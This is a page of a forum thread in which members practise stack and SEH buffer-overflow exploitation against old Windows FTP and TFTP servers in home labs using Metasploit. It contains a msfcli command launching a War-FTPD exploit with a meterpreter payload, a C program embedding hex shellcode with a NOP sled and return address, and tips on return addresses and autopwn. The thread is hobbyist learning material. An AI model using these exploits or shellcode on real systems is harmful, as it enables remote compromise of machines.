Page 6 of 10 FirstFirst ... 45678 ... LastLast
Results 51 to 60 of 97

Thread: Recreating Buffer Overflow

  1. #51
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    OK forget about PassiveX

    Framework users guide:
    "The PassiveX payloads will only work when the target system has Internet Explorer 6.0 installed (not 5.5 or 7.0)"

    But any luck with win32_reverse_vncinject ??

  2. #52
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    UnnamedOne

    Try using my ret \x50\x69\xC9\x74


    l1nuxant_ee

    I've achieved success with TFTPServerSPInstallerV1.41.
    If you want I can post my scripts...
    But now I've a new doubt.
    I'm trying the Msfweb (Metasploit) interface to launch automated exploits
    I'm trying win32_reverse_vncinject against War-FTPD 1.65... because it has an automated payload for XP SP2
    I can see that a courtesy shell appears in the victim but I get no VNC window to show up in my attacking machine, could you please try it to see if you achieve success?
    Get back to me when you can. Thanks

    P.S.- By the way, could you try PassiveX to. I wasn't able to use it... Is there a patch in XP SP2 against PassiveX?

    This is my prompt:

    Code:
    bt framework2 # ./msfcli warftpd_165_user RHOST=YYY.YYY.YYY.YYY PAYLOAD=win32_passivex_meterpreter TARGET=3 PXHTTPHOST=XXX.XXX.XXX.XXX PXHTTPPORT=80 E
    [*] Starting PassiveX Handler on XXX.XXX.XXX.XXX:80.
    [*] Trying Windows XP SP2 English using return address 0x71ab9372....
    [*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
    [*] Sending evil buffer....
    [*] Sending PassiveX main page to client...
    [*] Sending PassiveX DLL in HTTP response (106496 bytes)...
    [*] Exiting PassiveX Handler.#

    Well done, Really I havent tried it yet.
    From the previous one I was interested to learn the short jump command, and when to use it. Also how to check the SEH handler.
    BTW, i have used jmp EBP in it instead of jmp ESI, and it worked

    If you can post ur thoughts on the last exploit. What you have learnt from it, what was difficult.

  3. #53
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Hi I tryed greating a program and then overflow the buffer with the below code. When I run it in ollydbg ecx fills up with FFFFFFFF and then starts counting down until ffffffe0 and then moves to 0000061
    Any guidence please

    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <conio.h>
    
    
    int main()
    {
    char store[10],overflow[10000] = {"aaaaaaaaaaaaaaaaaaaa\x5c\xbd\xe2\x77\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba\xb4\x9a\x03\x83\xeb\xfc\xe2\xf4\x46\xde\x71\x4e\x52\x4d\x65\xfc\x45\xd4\x11\x6f\x9e\x90\x11\x46\x86\x3f\xe6\x06\xc2\xb5\x75\x88\xf5\xac\x11\x5c\x9a\xb5\x71\x4a\x31\x80\x11\x02\x54\x85\x5a\x9a\x16\x30\x5a\x77\xbd\x75\x50\x0e\xbb\x76\x71\xf7\x81\xe0\xbe\x2b\xcf\x51\x11\x5c\x9e\xb5\x71\x65\x31\xb8\xd1\x88\xe5\xa8\x9b\xe8\xb9\x98\x11\x8a\xd6\x90\x86\x62\x79\x85\x41\x67\x31\xf7\xaa\x88\xfa\xb8\x11\x73\xa6\x19\x11\x43\xb2\xea\xf2\x8d\xf4\xba\x76\x53\x45\x62\xfc\x50\xdc\xdc\xa9\x31\xd2\xc3\xe9\x31\xe5\xe0\x65\xd3\xd2\x7f\x77\xff\x81\xe4\x65\xd5\xe5\x3d\x7f\x65\x3b\x59\x92\x01\xef\xde\x98\xfc\x6a\xdc\x43\x0a\x4f\x19\xcd\xfc\x6c\xe7\xc9\x50\xe9\xe7\xd9\x50\xf9\xe7\x65\xd3\xdc\xdc\x8b\x5f\xdc\xe7\x13\xe2\x2f\xdc\x3e\x19\xca\x73\xcd\xfc\x6c\xde\x8a\x52\xef\x4b\x4a\x6b\x1e\x19\xb4\xea\xed\x4b\x4c\x50\xef\x4b\x4a\x6b\x5f\xfd\x1c\x4a\xed\x4b\x4c\x53\xee\xe0\xcf\xfc\x6a\x27\xf2\xe4\xc3\x72\xe3\x54\x45\x62\xcf\xfc\x6a\xd2\xf0\x67\xdc\xdc\xf9\x6e\x33\x51\xf0\x53\xe3\x9d\x56\x8a\x5d\xde\xde\x8a\x58\x85\x5a\xf0\x10\x4a\xd8\x2e\x44\xf6\xb6\x90\x37\xce\xa2\xa8\x11\x1f\xf2\x71\x44\x07\x8c\xfc\xcf\xf0\x65\xd5\xe1\xe3\xc8\x52\xeb\xe5\xf0\x02\xeb\xe5\xcf\x52\x45\x64\xf2\xae\x63\xb1\x54\x50\x45\x62\xf0\xfc\x45\x83\x65\xd3\x31\xe3\x66\x80\x7e\xd0\x65\xd5\xe8\x4b\x4a\x6b\x4a\x3e\x9e\x5c\xe9\x4b\x4c\xfc\x6a\xb4\x9a\x03"};
        strcpy(store,overflow);
        return 0;
    }

    In the bottom right of ollydbg the address is 0012d898 at the last of the 0x90

  4. #54
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I have changed my code around abit "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 nops" + shell code
    The xac\xfd... point to the middle of the nops and inthe debugger it gets direct to the it then the shell code, but I still don't get a shell. The program crash. The overflow buffer goes into a 8 char buffer.

    Thanks
    James

  5. #55
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by compaq View Post
    I have changed my code around abit "AAAAAAAAAAAA" + "\xac\xfd\x12\x00" + "about 20 nops" + shell code
    The xac\xfd... point to the middle of the nops and inthe debugger it gets direct to the it then the shell code, but I still don't get a shell. The program crash. The overflow buffer goes into a 8 char buffer.

    Thanks
    James
    Well, I would advice to start in incremental fashion in trying to exploit. I mean make your buffer contains only A's. If you got a crash, try to find when your EIP is filled. Then try to put a suitable jmp in the EIP, and use "\xCC" instead of your shell. (The "\xCC" is for debugging) so if ur jmp works correctly, in Olly you should jmp into your "\xCC", then replace the "\xCC" with your shell, and it should work.

  6. #56
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hi there l1nuxant_ee

    Basically what I understood from it was that the small jump overwrites the pointer to the next SH handler, the following 4 bits should be your ret to your shell code.
    You use this kind of exploits when you see that your buffer overwrote one of those sections that contained a SEH handler...
    How is it going with TFTPServerSPInstallerV1.41??
    That one is an interesting one too...

    In concern to the win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface I couldn't achieve success,it crashed the server all the time, but opened a shell....
    Well I decided to try it with another Ftp server CesarFTP and finally achieved success with that payload...

    Moving on ... I'm now toying around with "autopwn", great tool, except it never achieves to give me a shell...
    I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...
    I'm able to lunch successful attacks against these applications, has you have seen, but "autopwn" isn't
    Have you tried it before?

    Best regards.

  7. #57
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    Hi there l1nuxant_ee

    Basically what I understood from it was that the small jump overwrites the pointer to the next SH handler, the following 4 bits should be your ret to your shell code.
    You use this kind of exploits when you see that your buffer overwrote one of those sections that contained a SEH handler...
    How is it going with TFTPServerSPInstallerV1.41??
    That one is an interesting one too...

    In concern to the win32_reverse_vncinject against War-FTPD 1.65 with the msfweb interface I couldn't achieve success,it crashed the server all the time, but opened a shell....
    Well I decided to try it with another Ftp server CesarFTP and finally achieved success with that payload...

    Moving on ... I'm now toying around with "autopwn", great tool, except it never achieves to give me a shell...
    I've tried it with WarFTP, CesarFTP and an Apache server that was vulnerable...
    I'm able to lunch successful attacks against these applications, has you have seen, but "autopwn" isn't
    Have you tried it before?

    Best regards.
    I will be working on the TFTP Windows Server.

    Regarding autopwn, I have worked on it. if you got a successful attack, a session should be returned to you. To check if you have any active sessions, type:
    Code:
    sessions -l
    this will list your active sessions.
    and to use on of the listed sessions, type:
    Code:
    sessions -i %
    where % represents the number of the sessions (such as 1, 2....)

    Try it, and tell me what happens with you.

    BTW, hard luck for having Portugal out of Euro 2008

  8. #58
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hello l1nuxant_ee

    Please letts not talk about catastrofies.... (Portugal out of Euro2008)
    Our goal kepper sucks.... but the coach loved him....

    In concern to Autopwn I runned the command "sessions -l" but it returned no sessions..
    I don't understand it...
    I'm able to lunch attacks via Metasploit web interface and via console... my understanding of Autopwn is that it should do the same but automaticaly...
    In an exploit the only thing that changes are the return addresses of the libraries, that are suposed to be static across service packs, so since Nmap detects my OS has XP SP0/SP1, and since Autopwn is using the same exploites that come within the Framework, Autopwn should be able to lunch them successfully against my aplications, since I'm able to do the same, it shouldn't matter that I'm running a XP SP2, or should it??

    Is my line of thought incorrect?? Could you please comment.

  9. #59
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Quote Originally Posted by Armagedeon View Post
    Hello l1nuxant_ee

    Please letts not talk about catastrofies.... (Portugal out of Euro2008)
    Our goal kepper sucks.... but the coach loved him....

    In concern to Autopwn I runned the command "sessions -l" but it returned no sessions..
    I don't understand it...
    I'm able to lunch attacks via Metasploit web interface and via console... my understanding of Autopwn is that it should do the same but automaticaly...
    In an exploit the only thing that changes are the return addresses of the libraries, that are suposed to be static across service packs, so since Nmap detects my OS has XP SP0/SP1, and since Autopwn is using the same exploites that come within the Framework, Autopwn should be able to lunch them successfully against my aplications, since I'm able to do the same, it shouldn't matter that I'm running a XP SP2, or should it??

    Is my line of thought incorrect?? Could you please comment.
    You are correct on that. The idea of autopwn is to load known exploits based on the result returned by NMAP, and to try these exploits, and assign sessions if an exploit successed.

    how are you using autopwn ? do you use it using Fast|Track, if so, have you updated autopwn ??

  10. #60
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hello l1nuxant_ee

    After I installed Win2k and Win XP SP1 in VMware I obtained success in the PassiveX payload, and Autopwn was able to lunch successful exploits to against the XP SP1 box
    Nevertheless Autopwn steel stalls in the middle of some exploits I have used Autopwn alone and I have used Fast|Track and told it to update himself but it steel crashes or stalls for so long that I decide to punch Return to go to the console... But at least now it obtained three shells on the unpatched XP SP1
    I steel haven't tried it against the XP SP2 box but I haven't quit yet

    When your are finished with TFTPServerSPInstallerV1.41 he have to talk about CesarFTP0.99g, this one has me stunned hit a dead end and don't know how t deal with it... Need your help, but it can wait
    Best regards

Page 6 of 10 FirstFirst ... 45678 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •